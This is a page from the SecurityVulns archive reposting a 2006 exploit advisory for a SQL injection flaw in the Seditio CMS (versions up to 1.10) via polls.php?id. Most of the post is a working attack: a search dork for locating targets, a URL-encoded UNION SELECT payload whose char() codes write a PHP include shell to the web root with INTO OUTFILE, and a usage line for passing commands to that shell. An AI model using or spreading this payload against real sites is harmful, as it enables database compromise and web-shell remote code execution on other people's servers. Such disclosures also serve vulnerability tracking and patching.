Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]

  [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490

  Invision Gallery  2.0.7 SQL Injection Vulnerability

  LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:1 декабря 2006 г.
Subject:Seditio <= 1.10 (pollid) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  Seditio <= 1.10 (pollid) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# Dork    :  "Powered by Seditio"

*******************************************************************************

[[SQL]]]------------------------------------------------------

### http://[target]/[path]/polls.php?id=

Example:

//
polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,
117,100,101,40,36,99,109,100,41,59,63,
62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.
php'/*

.php?cmd=[shell]
""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород